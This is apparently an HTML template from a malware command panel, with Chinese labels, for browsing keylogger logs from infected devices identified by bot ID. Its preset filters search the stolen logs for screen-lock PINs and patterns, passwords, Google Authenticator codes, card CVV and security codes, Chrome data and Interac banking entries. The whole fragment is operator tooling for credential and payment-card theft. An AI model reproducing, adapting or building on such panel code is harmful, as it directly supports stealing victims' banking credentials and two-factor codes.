<div class="row">
	<!-- left pane -->
	<div class="col-lg-2">
		<div class="panel panel-default">
			<div class="panel-heading">
				<h3 class="panel-title">筛选</h3>
			</div>
			<div class="panel-body">
<form method='post' id='logFilterForm'>
	<input type='hidden' name='autoload' value='1' />
<p>设备ID: <input type='text' placeholder='123abc456def' class='form-control input-sm' style='font-size: 10pt;' name='bot_id' value='%FILTER_BOT_ID_VALUE%' /></p>
<p>文本: <textarea class='form-control input-sm' style='font-size: 10pt; height: 100px' name='filter_text' placeholder='关键词1|关键词2|关键词3' id='filter_text'>%FILTER_TEXT_VALUE%</textarea>

<script>
window.text1 = "PIN_PART|PIN_GOOD|SCREEN_PASSWORD:|GOOD_PATTERN:|TMP_PATTERN:";
window.text2 = "'Launcher' other";
window.text3 = "GOOGLE_AUTH";
window.text4 = "cvv|cvc|ccv|csc|card|Securecode|securityCode";
window.text5 = "'Chrome'";
window.text6 = "'Interac'";
window.text7 = today();

function today() 
{
	var date = new Date();

	var dd = date.getDate();
	var mm = date.getMonth()+1;
 
	if(dd < 10) dd = "0" + dd;
	if(mm < 10) mm = "0" + mm;

	return mm + '/' + dd;
}
function doFilteringBy(text)
{
	$("#filter_text").val(text)
	$("#logFilterForm").submit()
}

function resetFilter()
{
	$("#filter_text").val("")
	$("#logFilterForm").submit()
}
</script>
</p>
<p>在键盘记录中查找:<br />
	<span style='border-bottom: 1px blue dotted; color: blue' onclick='doFilteringBy(window.text7)'>今日记录</span><br />
	<span style='border-bottom: 1px blue dotted; color: blue' onclick='doFilteringBy(window.text1)'>密码</span><br />
	<span style='border-bottom: 1px blue dotted; color: blue' onclick='doFilteringBy(window.text2)'>浏览器数据</span><br />
	<span style='border-bottom: 1px blue dotted; color: blue' onclick='doFilteringBy(window.text3)'>谷歌验证</span><br />
	<span style='border-bottom: 1px blue dotted; color: blue' onclick='doFilteringBy(window.text4)'>银行卡</span><br />
	<span style='border-bottom: 1px blue dotted; color: blue' onclick='doFilteringBy(window.text5)'>Chrome</span><br />
	<span style='border-bottom: 1px blue dotted; color: blue' onclick='doFilteringBy(window.text6)'>Interac</span><br />
	
</p>

<p><input type="checkbox" checked id="fast_search" name="fast_search" /><label for="fast_search">&nbsp;快速搜索 (区分大小写)</label><br />
	<input type="button" onclick='resetFilter()' value="重置" class="btn btn-warning" />
	<input type="submit" style="float: right" value="筛选" class="btn btn-primary" />
</p>

</form>
			</div>
		</div>
	</div>

<!-- right pane -->
	<div class="col-lg-10">
		<div class="panel panel-default">
			<div class="panel-heading">
				<h3 class="panel-title">日志</h3>
			</div>
			<div class="panel-body">
%LOG_BODY%
			</div>
		</div>
	</div>
	
</div>
